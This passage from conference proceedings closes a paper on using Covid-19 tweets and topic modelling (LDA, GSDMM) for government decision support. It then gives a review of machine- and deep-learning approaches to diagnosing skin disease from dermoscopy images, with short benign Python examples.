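               "delhi lockdown extended", "loss of smell", "persistent dry cough"]

    vectors = TfidfVectorizer().fit_transform(phrases)
    kmeans = KMeans(n_clusters=3, n_init=10, random_state=42).fit(vectors)

    for label, phrase in zip(kmeans.labels_, phrases):
        print(label, phrase)   # phrases sharing a label form one information bucket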

3.3 Social and Economic Trend Prediction Module

In the era of Web 3.0, social media platforms have become the primary medium
of communication for everyone. People post about their day to day activities, vaca-
tions, experiences, feelings, express emotions, opinions, thoughts, ideas etc. span-
ning across the whole gamut of human life. This phenomenon continued during this
unprecedented global crisis situation caused by the pandemic of Covid-19; and on
social media people were talking about a multitude of topics like work from home,
job losses, hunger, deaths, depression, domestic violence, supply chain of FMGC
goods, availability of hospitals and care, vaccination for corona, and what not. The
plethora of topics being talked about on social media has been dynamic and evolved
during the course of the pandemic through various month in 2020. For example, in
India initially people were talking about availability of sanitizers, masks and hospi-
tal care; then about imposed lockdown and the condition of migrant labourers, job
losses and work from home, vaccination development, GDP contraction and sectors
of economy which were impacted the most; users were also discussing about eco-
nomic and social reforms required for recovery in the later months of 2020. Presently,
people are talking about the efficacy and side effects of Covid-19 vaccinations, dif-
ferent vaccines available and their administration etc. These are just few examples.
The topics of conversations on social media varied across the globe from nation to
nation. But the underlying uniform characteristic of these social media conversations
is: they represent the common public concerns and interests, challenges and issues
faced by the common citizens, the impact and acceptability of the measures taken by
the government, and the future social and economic challenges that lie ahead of the
nation’s government to address in the coming years. It is a known fact now that the
world will take 3–5 years to fully recuperate from the social, economic and health-
care impact of Covid-19 pandemic. This is the main motivation behind choosing
social-economic global trend prediction as one of our research goals.
We use Latent Dirichlet Allocation (LDA) and Gibbs Sampling Dirichlet Mixture
Model (GSDMM) algorithm for topic modelling from unstructured user generated
text on social media. Topic modelling is an unsupervised machine learning technique
which builds a statistical topic model from raw unstructured text to discover hidden
and abstract topics, themes and ideas being discussed in them. Topic modelling
is an effective technique to quickly understand and summarize large volumes of
free form text and extract meaningful insights when annotated or labelled data is
not available. We implemented topic modelling in our proposed decision-making
governance framework as it can quickly build comprehension about what common
people are discussing on social media from the Covid-19 related user posts. As we
mentioned before, having this comprehension can help government bodies better
understand the common public concerns and challenges, opinions of citizens, and
discover various social and economic topics.
The LDA algorithm [10] builds a statistical model based on the distribution of words
in any given input document by considering each document as a collection of topics,
where each topic is in turn a collection of semantically related dominant keywords.
LDA represents each document as a mixture (probability distribution) of topics and
each topic as a mixture (probability distribution) of words, and tries to infer what
topics would create the probability distribution of words as seen in the documents.
The LDA algorithm treats documents as bags of words and is based on a matrix factorization
technique, where the aim is to convert the Document-Term matrix (N, M) into two
lower dimension matrices: a Document-Topic matrix (N, K) and a Topic-Word matrix (K, M);
K being the input parameter, i.e. the number of top topics to extract.
After an initial random assignment of topics to documents and words to topics, LDA
optimizes the probability distributions of the lower dimension matrices by improving
the assignments made in the previous steps. It iterates through each document and
each of its words to determine the proportion in which they contribute to the topic assigned to
the document and the proportion in which they contribute to the overall topics across
all documents, based on which they are reassigned to new topics. In this way, LDA
backtracks to compute the topic-word distribution that would create the topics the
overall document set represents. The hyperparameters alpha and beta control the document-topic
and topic-word densities: alpha decides the number of topics assigned to each
document, and beta controls the number of words used to model a topic. GSDMM is
a variation of LDA proposed by [11] for short text topic modelling; this algorithm
assumes that a document consists of a single topic only, instead of a mixture of topics
as in the case of LDA. In our implementation, the pre-processed user posts are the input
documents for the algorithm.
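A hedged sketch of the LDA step with the Gensim library (the library used in the prototype described in Sect. 4) is given below; the toy token lists, the number of topics, and the hyperparameter settings are illustrative only:

    # Sketch: LDA topic modelling over pre-processed, tokenized posts with Gensim.
    from gensim import corpora
    from gensim.models import LdaModel

    tokenized_posts = [
        ["lockdown", "extend", "delhi", "migrant", "labourer"],
        ["sanitizer", "mask", "shortage", "hospital"],
        ["job", "loss", "work", "home", "salary"],
    ]  # in practice: the cleaned, lemmatized tokens of each user post

    dictionary = corpora.Dictionary(tokenized_posts)               # word <-> id mapping
    corpus = [dictionary.doc2bow(doc) for doc in tokenized_posts]  # document-term counts

    lda = LdaModel(corpus=corpus, id2word=dictionary, num_topics=3,
                   alpha="auto", eta="auto", passes=10, random_state=42)

    for topic_id, keywords in lda.print_topics(num_words=5):
        print(topic_id, keywords)   # dominant keywords per discovered topic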

4 Implementation and Results

Building such decision support frameworks requires complex interdisciplinary
research by different government and public organizations, and needs skilled professionals
to derive value from the insights provided by the system for effective decision
making and governance. Aggregating time-variant data from various heterogeneous
sources is another daunting task in building such real-world applications. At the same
time, citizens' privacy and trust should be kept in mind while developing such systems,
as they may perceive these technologies to be surveillance systems. Due to the
above constraints, we did a prototype implementation of our proposed decision support
framework, to demonstrate, as a proof of concept, how this framework can
assist in governance and decision making during the pandemic. This is a novel idea
for governance during pandemics, as we could not find a similar framework in the
existing literature survey to serve as a baseline for comparison with our proposed framework.
The dataset used, sample results and other details of implementation are elaborated
in this section.

Various Twitter datasets of Covid-19 related tweets have been collected and made
publicly available for research3,4,5 [12]. We used the tweets from one of these publicly
available datasets6; this dataset has been collected since early March 2020, i.e.
the time when the pandemic began. It contains the Tweets by users who
applied various Covid-19 related hashtags, e.g. #coronavirus, #coronavirusoutbreak,
#coronaviruspandemic, #covid19, #ihavecorona, etc. Out of this dataset, we selected
tweets in the English language for the India region, during the period from 29 March 2020 to
30 April 2020. This selected dataset had approximately 42,000 tweets from various
locations in India, as depicted in Fig. 2; the date-wise distribution of the
selected dataset is shown in Fig. 3.
We used the Cython-based spaCy library for implementing our Information Extraction
Module for extracting entities and noun and verb phrases. spaCy is the fastest library
for NLP tasks for building large-scale, industrial, real-world natural language understanding
systems and is meant for production scale usage7; hence, it is the first obvious
choice for implementing our Big Data framework. The most important entities and
nouns extracted from the selected dataset are depicted in Fig. 4.
Next, we used the Gensim Python library to implement the LDA algorithm for topic
modelling, and pyLDAvis for graphical visualization of the topic-word clusters obtained.
For the prototype implementation of the GSDMM algorithm, we referred to GitHub libraries
and tutorials.8,9,10 After multiple experiments, we extracted 17 topics with 317
unique words (i.e., a Topic-Word (K, M) matrix of (17, 317)) that had minimal overlap
between the topic clusters (ref. Fig. 5); top keywords from two sample topic clusters are
also shown in the figure.

Fig. 2 Tweets dataset location and region distribution

Fig. 3 Tweets dataset date-wise distribution

Fig. 4 Sample of entities and nouns extracted

Fig. 5 Visualization of LDA topic clusters formed

3 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
4 https://github.com/ben-aaron188/covid19worry.
5 https://github.com/thepanacealab/covid19_twitter.
6 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
7 https://spacy.io/.
8 https://towardsdatascience.com/short-text-topic-modelling-70e50a57c883.
9 https://github.com/rwalk/gsdmm.
10 https://github.com/Matyyas/short_text_topic_modeling/blob/master/notebook_sttm_example.ipynb.
11 https://www.worldometers.info/coronavirus/.

5 Discussion and Future Work

As of this writing, there have been around 2.2 million deaths worldwide and over 100 million
Covid-19 cases.11 Covid-19 is an unforeseen global health emergency that has caused
fear, uncertainty, mental health issues, and a lot of pain due to the irreplaceable loss
of loved ones. The collateral damage and impact of the pandemic on society and the
economy cannot be accurately gauged, and the lasting impact of this pandemic will
only be known in the years to come. Hence, it becomes imperative for the government
and public institutions to monitor real-time data, take data-driven informed decisions,
and continuously observe their efficacy. Due to the popularity and gigantic user base,
social media platforms are a powerhouse for first hand information from citizens.
From the literature survey done, we did not find an extensive use of publicly available,
real time, social media data feeds for governance during the pandemic of Covid-19.
To address this research gap, we proposed an intelligent decision support framework
for efficacious governance that can immensely assist in data-driven decision making
during any such global emergency, presently the Covid-19 pandemic. As a
proof of concept, we have successfully demonstrated the prototype implementation
of our proposed framework on a sample publicly available Covid-19 tweet dataset.
As part of our future research, we plan to enhance this governance framework to
incorporate multilingual and multimodal user generated content, since India itself
has many vernacular languages. Another important module we wish to incorporate
in our governance framework will be for controlling the spread of misinformation
through social media, since we all know it leads to unwanted fear, panic, and anxiety
among the citizens of the country during such a difficult crisis.

References

1. Alamo, T., Reina, D. G., & Millán, P. (2020). Data-driven methods to monitor, model, forecast
and control covid-19 pandemic: Leveraging data science, epidemiology and control theory.
arXiv preprint arXiv:2006.01731.

2. Rekha Hanumanthu, S. (2020). Role of intelligent computing in COVID-19 prognosis: A state-of-the-art review. Chaos, Solitons & Fractals, 109947.
3. Bullock, J., Pham, K. H., Lam, C. S. N., & Luengo-Oroz, M. (2020). Mapping the landscape
of artificial intelligence applications against COVID-19. arXiv preprint arXiv:2003.11336.
4. Oyebode, O., Ndulue, C., Mulchandani, D., Suruliraj, B., Adib, A., Orji, F. A., ... & Orji, R.
(2020). COVID-19 pandemic: Identifying key issues using social media and natural language
processing. arXiv preprint arXiv:2008.10022.
5. Samuel, J., Ali, G. G., Rahman, M., Esawi, E., & Samuel, Y. (2020). Covid-19 public sentiment
insights and machine learning for tweets classification. Information, 11(6), 314.
6. Aslam, F., Awan, T. M., Syed, J. H., Kashif, A., & Parveen, M. (2020). Sentiments and emotions
evoked by news headlines of coronavirus disease (COVID-19) outbreak. Humanities and Social
Sciences Communications, 7(1), 1–9.
7. Low, D. M., Rumker, L., Talkar, T., Torous, J., Cecchi, G., & Ghosh, S. S. (2020). Natural
language processing reveals vulnerable mental health support groups and heightened health
anxiety on reddit during COVID-19: Observational study. Journal of Medical Internet research,
22(10),
8. Pu, C., Suprem, A., & Lima, R. A. (2020). Challenges and opportunities in rapid epidemic
information propagation with live knowledge aggregation from social media. arXiv preprint
arXiv:2011.05416.
9. Chen, Q., Leaman, R., Allot, A., Luo, L., Wei, C. H., Yan, S., & Lu, Z. (2020). Artificial Intelli-
gence (AI) in action: Addressing the COVID-19 pandemic with Natural Language Processing
(NLP). arXiv preprint arXiv:2010.16413.
10. Blei, D. M., Ng, A. Y., & Jordan, M. I. (2003). Latent dirichlet allocation. Journal of Machine
Learning research, 3(1), 993–1022.
11. Yin, J., & Wang, J. (2014). A dirichlet multinomial mixture model-based approach for short text
clustering. In Proceedings of the 20th ACM SIGKDD International Conference on Knowledge
Discovery and Data Mining (pp. 233-242).
12. Banda, J. M., Tekumalla, R., Wang, G., Yu, J., Liu, T., Ding, Y., & Chowell, G. (2020). A
large-scale COVID-19 Twitter chatter dataset for open scientific research–an international
collaboration. arXiv preprint arXiv:2004.03688.
Skin Disease Diagnosis: Challenges
and Opportunities

Vatsala Anand, Sheifali Gupta, and Deepika Koundal

Abstract The skin acts as a protective barrier against environmental danger and
foreign substances. Every year, millions of people are affected by skin
disorders that may cause skin cancer at a later stage. The problem of skin disorders and
skin cancer is spreading fast due to exposure to sunlight, pollutants, chemicals like
nitrates and arsenic, and ultraviolet rays. This is an alarming disease, so it is necessary for
everyone to pay attention to it. Automatic recognition of skin disease from
dermoscopic images is a big challenge due to low contrast, huge inter-/intra-class
variation, and high visual similarity among the different skin lesions. With the explosion
of advanced information and recognition models, primarily Deep Learning
(DL) and Transfer Learning (TL) models, all aspects of recent research have been
influenced. In this paper, a brief discussion is given of skin disease and the work
that has already been done using Machine Learning (ML) and Deep Learning (DL) models.
A system will be developed in the future for early diagnosis of skin disease in which
the features of dermoscopy images will be extracted using a Convolutional Neural
Network (CNN). The system will thus be efficient in focusing on the right features of
the image and will help enhance accuracy by minimizing the amount of error
in image interpretation. It can provide a more confident diagnosis to dermatologists
and can assist doctors, as a second opinion, in making accurate decisions.

Keywords Diagnosis · Machine learning · Deep learning · Dermoscopy · Skin ·
Convolutional neural network · Classification

V. Anand (B) · S. Gupta


Chitkara University Institute of Engineering and Technology, Chitkara University, Chandigarh,
Punjab, India
e-mail: vatsala.anand@chitkara.edu.in
S. Gupta
e-mail: sheifali.gupta@chitkara.edu.in
D. Koundal
Department of Virtualization, School of Computer Science, University of Petroleum and Energy
Studies, Dehradun, India
e-mail: dkoundal@ddn.upes.ac.in


1 Introduction

The skin is an outer covering which separates the environment from the body of human beings.
Skin is made of flexible outer tissue. It performs three main functions: protection, regulation,
and sensation. It regulates body temperature and stores water, vitamin D,
and fat. The two main layers of skin are the dermis and the epidermis. The epidermis is the
outermost layer, separated from the dermis. Unlike the dermis, the epidermis layer is not thick,
and it does not contain blood vessels [1]. Melanocytes are located in the bottom layer of
the skin's epidermis; they are melanin-producing, neural crest-derived cells.
The dermis is a connective tissue composed of two layers: the deeper layer
is the reticular layer, and the outer layer is the superficial papillary layer. The hypodermis
consists of loose connective tissue with collagen and elastin fibers.

1.1 Skin Disease

Skin disease includes skin infections caused by exposure to the sun, in which irregular
cells develop in the epidermis, the outer layer of the skin. It is characterized
by dark, wart-like patches on the body which can be benign or malignant. Sometimes,
common skin abnormalities such as birthmarks are also referred to as skin disease. The
various kinds of skin disease are discussed as follows:
(i) Actinic Keratoses (AKIEC): It is also known as solar keratosis or Bowen's
disease. It is a type of sun damage due to exposure to sunlight, in which
abnormal cells develop in the topmost layer of the skin. It looks like a scaly
patch or rough skin, as shown in Fig. 1. A small percentage of actinic keratoses
can eventually become skin cancer. The risk can be reduced by protecting the skin from
ultraviolet (UV) rays [2].
(ii) Benign Keratosis or Seborrheic Keratosis (BKL): It is a non-cancerous
growth of the skin. Older people have more BKL. It is usually black, light
tan, or brown. The growths look slightly raised, as shown in Fig. 2. They are
harmless and not contagious, and treatment is not required. On the
other hand, they can be removed if a person does not like how they look [4].
Fig. 1 Dataset example taken from: Actinic Keratoses [3]

Fig. 2 Dataset example taken from: Benign Keratosis [3]

Fig. 3 Dataset example taken from: Dermatofibromas [3]

(iii) Dermatofibromas (DF): These are small, harmless growths that appear on the
skin. They can grow on any part of the body, but they are commonly seen on the
lower legs, upper back, and arms, as shown in Fig. 3. They can be seen in adults
but are very rare in children [5].
(iv) Melanocytic Nevi (NV): Melanocytic nevi or a melanocytic nevus can be seen
on the body of almost all individuals, as shown in Fig. 4. Some people have
few, while others have hundreds of melanocytic nevi on the body [6].
(v) Vascular Lesions (VASC): These are common abnormalities, more commonly known
as birthmarks, as shown in Fig. 5.
(vi) Skin Cancer: Skin cancer is a type of cancer which develops on skin when
exposed to sunlight. Exposure to ultraviolet light or ionizing radiations can
also cause skin cancer. This problem is worse in high elevation areas or the

Fig. 4 Dataset example taken from: Melanocytic nevi [3]

Fig. 5 Dataset example taken from: Vascular lesions [3]



Fig. 6 Dermoscopy image of a melanoma [3], b non-melanoma [7]

areas near the equator where sunlight exposure is more intense. Certain medications, such as chemotherapy agents, can also increase the risk of skin cancer. Fair-skinned and fair-haired people are prone to skin cancer because of their insufficient skin pigmentation. Exposure to chemical pollutants (nitrates, arsenic, tar, coal, oils, and paraffins) and scars from severe burns can also cause skin cancer. Skin cancer falls into two major categories: non-melanoma and melanoma.
a. Melanoma (MEL): It affects the melanocyte cells that exist in the lowest layer of the epidermis. It is malignant in nature and tends to spread to other parts of the body. It occurs in small but significant numbers and is fatal if it is not treated early. Sometimes an existing mole that itches, bleeds, or changes shape or color indicates melanoma. It appears as a small black spot or as a larger brownish patch with white or red speckles, and it can spread easily. It is linked with the melanocytes of the epidermal layer, and its cure rate is low. Figure 6 shows dermoscopy images of melanoma and non-melanoma.
b. Non-Melanoma: It does not affect melanocytes and is unlikely to spread to other parts of the body, although it may be locally disfiguring if it is not treated early. These cancers progress slowly, rarely spread beyond the skin, can be detected easily, and are usually curable. Figure 6b shows the dermoscopy image of non-melanoma. Non-melanoma is the most commonly occurring skin cancer, with more than 4.3 million cases of basal cell carcinoma and over 1 million cases of squamous cell carcinoma [7]. The broader category of non-melanoma skin cancer includes basal cell carcinoma (BCC) and squamous cell carcinoma (SCC).
• Basal Cell Carcinoma (BCC): It is a widely recognized disease in people. Its main symptoms include a reddish, bluish, or brown-black patch of skin. It arises from the basal layer of the epidermis and begins as a small waxy nodule with pearly borders. BCC is characterized by erosion and invasion of adjoining tissues. It rarely metastasizes, but its recurrence is common.
• Squamous Cell Carcinoma (SCC): It appears as a scaly patch or a firm reddish bump that grows gradually. It can be treated without difficulty if detected early, but it is more likely to spread than BCC. Among Black and Asian Indian people, it is the most frequently seen skin cancer. Figure 7b shows an image of squamous cell carcinoma.
Early diagnosis of skin cancer involves removal and microscopic examination of the cells. Between 30 and 50% of cancers can currently be prevented by avoiding risk

Fig. 7 Dermoscopy image of a BCC [3], b SCC [8]

factors. The cancer burden can also be reduced through early detection of cancer and
management of patients who develop cancer [9].

1.2 Skin Disease Diagnosis

Nowadays, there is a need to educate people about the consequences of skin disease. Awareness of skin disease comes first; programs can also be designed to reduce delays and barriers so that patients can be treated in a timely manner. It is important to prevent skin disease; otherwise, it may develop into skin cancer. Preventive measures include applying sunscreen lotion whenever exposed to sunlight, staying out of the sun during hot days, and wearing protective clothing to avoid direct exposure to the sun. Dermatologists often examine features of the skin such as color, shape, and texture visually to diagnose a lesion as a benign or malignant tumor [10]. The imaging modality used for classification and diagnosis of skin disease is the dermoscopy image. The examination of skin disease with a device called a dermatoscope, which consists of an illumination system with a high-quality magnifying lens, is called dermoscopy [11], as shown in Fig. 8. Dermoscopic images are becoming very popular as many large dermoscopic datasets are publicly available.

Fig. 8 Dermatoscope device for skin diagnosis [11]

1.3 Publicly Available Dataset for Skin Disease

A database is an important part of any image classification system. For any image classification system based on deep learning, collecting an adequate amount of data to form a dataset is critical. Constructing such a dataset requires a large amount of time, expertise in the relevant domain to select the right information, and infrastructure for capturing the data and transferring it to a system, so data collection is not an easy task. Generally, a standard dataset already existing in the research area and adequate for the problem domain is used. An advantage of using an existing dataset is that it enables a fair comparison between different system designs. Table 1 lists popular skin disease datasets that are publicly available.
The rest of the paper is structured as follows. Section 2 presents the literature review, followed by the justification of the research in Sect. 3, and the research gaps and problem statement in Sects. 4 and 5. Section 6 contains the conclusion.

2 Literature Review

The presence of skin disease can be identified by irregular edges, changed color, or sometimes a patch on the skin. Different researchers have designed different techniques for the diagnosis of skin disease using machine learning and deep learning architectures. The relevant literature in this domain presenting the work done by different researchers is studied here; each researcher has tried to design a different model and has obtained a different level of prediction accuracy. Machine learning essentially teaches computers to perform tasks that humans can naturally perform, but it is less accurate when working with large amounts of data for prediction purposes [17, 18]. Garnavi et al. [19] presented a clustering-based histogram thresholding algorithm for segmentation, in which morphological operators are applied to obtain the segmented lesion. The algorithm was tested on 30 high-resolution dermoscopy images and achieved an accuracy of 97%. Fassihi et al. [20] performed segmentation using morphological operators and feature extraction using the wavelet transform; in the pre-processing step, a mean filter was used for noise removal. The method achieved an accuracy of 90% on a dataset of 91 images taken from hospitals and websites. Smaoui et al. [21] applied pre-processing followed by region-growing segmentation, then feature extraction and the ABCD rule, on a set of 40 dermoscopic images, achieving an accuracy of 92%, a sensitivity of 88.88%, and a specificity of 92.3%. Deep learning (DL) learns features directly from the given data. Deep learning techniques are capable of handling high-dimensional data, give better performance, and are efficient in focusing on the right features of the image on their own. Therefore, deep learning proves to be more efficient than machine learning techniques, as it can work with large databases and

Table 1 Publicly available skin disease dataset


HAM10000 [3]: 7 classes (AKIEC: 327, BKL: 1099, NV: 6705, BCC: 514, VASC: 142, MEL: 1113, DF: 115); image size 600 × 450; 10,015 images in total
Interactive Atlas of Dermoscopy [12]: 2 classes (BCC, MEL; per-class counts not given); image size 768 × 512; 1000 images in total
Dermofit Image Library [13]: 10 classes (AKIEC: 45, BKL: 257, NV: 331, BCC: 239, intraepithelial carcinoma: 78, MEL: 76, DF: 65, haemangioma: 97, pyogenic granuloma: 24, SCC: 88); image size not given; 1300 images in total
PH2 [14]: 3 classes (melanocytic nevi: 160, MEL: 40); image size 768 × 560; 200 images in total
Kaggle [15]: 2 classes (benign: 1800, malignant: 1497); image size 224 × 224; 3297 images in total
ISIC Archive [16] (ISIC-2016, ISIC-2017): 4 classes (melanoma, non-melanoma, NV, BKL; per-class counts not given); image size not given; 4029 images in total

with more accuracy. In recent years, improvements in deep learning convolutional neural networks (CNNs) have shown favorable results, and classification in medical image processing has become a challenging research domain [22]. Zafar et al. [23] proposed a method combining two architectures, U-Net and ResNet, collectively called Res-Unet. The datasets used were the PH2 dataset with 200 dermoscopic images and the ISIC-17 test data consisting of 600 images. On

the ISIC-17 dataset, the Jaccard index was 77.2% and the dice coefficient was 0.858, whereas on the PH2 dataset the Jaccard index was 85.4% and the dice coefficient was 0.924. Amin et al. [24] performed pre-processing to resize the images and used the Otsu algorithm to segment the skin lesion. The publicly available datasets (PH2, ISBI 2016-2017) were merged to form a single large dataset for validation of the proposed method. The obtained results show a sensitivity of 99.52%, a specificity of 98.41%, a positive predictive value of 98.59%, a false negative rate of 0.0158, and an accuracy of 99.00%. Mahbod et al. [25] investigated image down-sampling and cropping of skin lesions together with a three-level fusion approach. A total of 12,927 dermoscopic skin lesion images extracted from the ISIC archive and the HAM10000 dataset were used, and an accuracy of 86.2% was achieved. There are some limitations in this work: the biggest limitation of the fusion approach is the large number of sub-models used, which consequently need significant training time.
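As an illustration of the classical thresholding-based segmentation step mentioned above (for example, the Otsu segmentation used by Amin et al. [24]), the following is a minimal Python sketch using scikit-image; it is not the implementation of any of the cited works, and the file name and clean-up parameters are placeholders.

# Minimal Otsu-thresholding sketch for lesion segmentation (illustrative only).
# Assumes scikit-image is installed; "lesion.jpg" is a placeholder file name.
from skimage import io, color, filters, morphology

image = io.imread("lesion.jpg")               # RGB dermoscopic image
gray = color.rgb2gray(image)                  # grayscale image in [0, 1]
threshold = filters.threshold_otsu(gray)      # global Otsu threshold
mask = gray < threshold                       # lesion pixels are usually darker than skin
# Simple clean-up: drop small speckles and fill small holes in the binary mask
mask = morphology.remove_small_objects(mask, min_size=200)
mask = morphology.remove_small_holes(mask, area_threshold=200)
print("Lesion pixels:", int(mask.sum()), "of", mask.size)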

3 Justification of Research

People do not take skin disease seriously, and nowadays skin disease is a cause of deaths worldwide. To prevent this, it is necessary to diagnose the disease at early stages. Skin disease is one of the major causes of deaths in the US and worldwide, and its occurrence in humans has been increasing day by day. It is important to prevent skin disease; otherwise, it may develop into skin cancer. It is estimated that 196,060 new cases of melanoma, 95,710 non-invasive (in situ) and 100,350 invasive, will be diagnosed in the US in 2020. Invasive melanoma is projected to be the fifth most common cancer for men (60,190 cases) and the sixth most common cancer for women (40,160 cases) in 2020 [26]. In 2020, an estimated 6,850 deaths will be attributed to melanoma: 4,610 men and 2,240 women. Due to the small number of trained dermatologists in the world, precise diagnosis of skin disease in dermoscopy images is difficult. AI-enabled image analysis techniques such as deep learning help in obtaining a clear picture of the disease in the image. Deep learning-based systems can be employed to improve the performance of disease diagnosis in the field of medical science by minimizing errors in image interpretation and enhancing accuracy.

4 Research Gaps

Based on the literature survey conducted in this research area, the following research gaps are identified. A large dataset is needed to reduce the overfitting problem and to obtain better accuracy and generalization of the model. Fuzzy borders, noise, low brightness, skin hair and bubbles, and color variation are issues that vary from image to image, and they remain a major challenge in segregating the affected area in dermoscopic images. A number of skin lesions can mimic skin disease, which could result in misdiagnosis due to inter-class similarities; for example, in dermoscopic images, benign keratosis can mimic skin diseases including BCC, SCC, and melanoma. On the contrary, a number of skin lesions show intra-class dissimilarities in terms of color, attributes, texture, and size, which could also result in misdiagnosis; certain melanomas, for instance, are found to be of normal skin color, reddish, or pinkish. There is therefore a need to develop a model which can accurately predict skin disease in dermoscopic images. A model with such an approach can aid in early diagnosis of skin disease, assist doctors in taking crucial decisions regarding medication, and help save lives.

5 Problem Statement

The occurrence of skin disease is increasing; therefore, timely diagnosis is necessary for its treatment. Proper diagnosis and medication are important to prevent any life threat caused by the disease. DL-based systems can be employed to improve the performance of disease diagnosis in the field of medical science by minimizing errors in image interpretation and enhancing accuracy. The proposed objectives of this research work are to pre-process the skin disease dataset for training a DL-based neural network model and to propose a model for accurate detection of skin disease in dermoscopy images. To attain these objectives, normalization and data augmentation are implemented in the data pre-processing stage for better training, as shown in Fig. 9. Normalization of the data is used to keep numerical stability in the CNN architectures; with its help, a CNN model is expected to learn faster. In deep learning, a large amount of data is required to achieve good accuracy. Moreover, it is very hard and difficult to

Fig. 9 Proposed methodology



collect medical images. To resolve this issue, data augmentation can be used to increase the number of images. Data augmentation is performed using different transformation techniques such as flipping the images horizontally and vertically; other augmentation techniques such as rotation, brightness adjustment, and zooming can also be applied to the original images to increase the dataset size. After that, a CNN-based model will be proposed for accurate detection of skin disease in dermoscopy images. Then, a comparison will be done using different metrics such as precision, accuracy, specificity, sensitivity, and F1 score, and the performance will be validated against other state-of-the-art models.
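To make the pre-processing stage concrete, the following is a minimal sketch of normalization and data augmentation (horizontal/vertical flips, rotation, brightness, and zoom) with the Keras ImageDataGenerator; the directory layout, image size, and parameter values are illustrative assumptions and not the exact settings of the proposed pipeline.

# Illustrative normalization + augmentation sketch using tf.keras.
# "data/train" is a placeholder directory with one sub-folder per lesion class.
from tensorflow.keras.preprocessing.image import ImageDataGenerator

train_gen = ImageDataGenerator(
    rescale=1.0 / 255,            # normalization: scale pixel values to [0, 1]
    horizontal_flip=True,         # random horizontal flips
    vertical_flip=True,           # random vertical flips
    rotation_range=20,            # random rotations up to 20 degrees
    brightness_range=(0.8, 1.2),  # random brightness changes
    zoom_range=0.1,               # random zoom
)

train_data = train_gen.flow_from_directory(
    "data/train",                 # placeholder path to the training images
    target_size=(224, 224),       # resize every image to a fixed size
    batch_size=32,
    class_mode="categorical",     # one-hot labels, e.g., for the seven HAM10000 classes
)

The resulting generator can be passed directly to a Keras model's fit method, so that augmented images are produced on the fly during training.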

6 Conclusion

Skin disease cases are increasing day by day; therefore, early diagnosis of skin disease is important, otherwise it may develop into skin cancer, so it is necessary for everyone to pay attention to it. Proper and early diagnosis of skin disease is important to prevent any life threat caused by it. A deep learning-based system will therefore be developed in future work for early diagnosis of skin disease, in which the features of the images will be extracted using a convolutional neural network. Such a system will be efficient in focusing on the right features of the image and will help enhance accuracy by minimizing errors in image interpretation. A model with such an approach can assist doctors in taking crucial decisions and can help save lives. The proposed model design can therefore aid in early diagnosis of skin disease; it can provide more confident diagnoses to dermatologists and can assist doctors as a second opinion in providing accurate decisions.

References

1. Seeley, R., Stephens, D., & Philip, T. (2008). In Anatomy and physiology (pp. 1–1266).
McGraw-Hill.
2. Nouveau, S., & Braun, R. (2018). Solar lentigines-dermoscopedia. [Online Accessed August
19 2020].
3. Tschandl, P., Rosendahl, C., & Kittler, H. (2018). The HAM10000 dataset a large collection of
multi-source dermatoscopic images of common pigmented skin lesions. Scientific Data, 14(5).
4. Oakley, A. (2018). DermNet NZ Seborrhoeic Keratosis. [Online Accessed August 19 2020].
5. Pedro, Z. (2018). Dermatofibromas-dermoscopedia. [Online Accessed August 19 2020].
6. Braun, R. (2018). Benign melanocytic lesions-dermoscopedia. [Online Accessed August 19
2020].
7. Rogers, H. W., Weinstock, M. A., Feldman, S. R., & Coldiron, B. M. (2012). Incidence esti-
mate of non-melanoma skin cancer (keratinocyte carcinomas) in the US population. JAMA
dermatology, 151(10), 1081–1086.
8. Treatment Guides. (2007). Squamous Cell Carcinoma—Treatment. Retrieved December 21, 2007, from https://www.skintherapyletter.com/skin-cancer/squamous-cell-carcinoma/.
9. World Health Organization. “Cancer Prevention”, Retrieved from https://www.who.int/cancer/
prevention/en/.

10. Bray, F., Ferlay, J., Soerjomataram, I., Siegel, R. L., Torre, L. A., & Jemal, A. (2018). Global
cancer statistics 2018: GLOBOCAN estimates of incidence and mortality worldwide for 36
cancers in 185 Countries. CA: A Cancer Journal for Clinicians, 68(6), 394–424.
11. https://www.medgadget.com/2011/01/handyscope_turns_iphone_into_professional_dermat
oscope.html.
12. Argenziano, G., Soyer, H. P., Giorgi, V. D., Piccolo, D., Carli, P., & Wolf, I. H. (2000) Interactive
Atlas of Dermoscopy-EDRA Medical Publishing & New Media.
13. Dermofit Image Library. https://homepages.inf.ed.ac.uk/rbf/DERMOFIT/datasets.htm.
14. Mendonça, T., Ferreira, P. M., Marques, J. S., Marcal, A. R., & Rozeira, J. (2013). PH 2-A
dermoscopic image database for research and benchmarking. In 2013 35th Annual International
Conference of the IEEE Engineering in Medicine and Biology Society (EMBC) (pp. 5437–
5440).
15. Kaggle Dataset https://www.kaggle.com/fanconic/skin-cancer-malignant-vs-benign.
16. https://www.isic-archive.com/#!/topWithHeader/wideContentTop/main.
17. Alzubi, J. A., Kumar, A., Alzubi, O. A., Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research and Development.
18. Alweshah, Alzubi, O. A., Alzubi, J. A., Mohammed, S. A. (2016). Solving attribute reduction
problem using wrapper genetic programming. International Journal of Computer Science and
Network Security.
19. Garnavi, R., Aldeen, M., Celebi, M. E., Bhuiyan, A., Dolianitis, C., & Varigos, G. (2010).
Automatic segmentation of dermoscopy images using histogram thresholding on optimal color
channels. International Journal of Medicine and Medical Sciences, 1(2), 126–134.
20. Fassihi, N., Shanbehzadeh, J., Sarrafzadeh, H., & Ghasemi, E. (2011) Melanoma diagnosis by
the use of wavelet analysis based on morphological operators. In International Multi Conference
of Engineers and Computer Scientists.
21. Smaoui, N., & Bessassi, S. (2013). A developed system for melanoma diagnosis. International
Journal of Computer Vision and Signal Processing, 3(1).
22. Tiwari, P., Qian, J., Li, Q., Wang, B., Gupta, D., Khanna, A., Rodrigues, J., & Albuquerque, V. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems Research (Elsevier).
23. Zafar, K., Gilani, S. O., Waris, A., Ahmed, A., Jamil, M., Khan, M. N., & Sohail, K.
A. (2020). Skin lesion segmentation from dermoscopic images using convolutional neural
network. Sensors, 20(6).
24. Amin, J., Sharif, A., Gul, N., Anjum, M. A., Nisar, M. W., Azam, F., & Bukhari, S. A. (2020).
Integrated design of deep features fusion for localization and classification of skin cancer.
Pattern Recognition Letters, 131, 63–70.
25. Mahbod, A., Schaefer, G., Wang, C., Dorffner, G., Ecker, R., & Ellinger I. (2020). Transfer
learning using a multi-scale and multi-network ensemble for skin lesion classification.
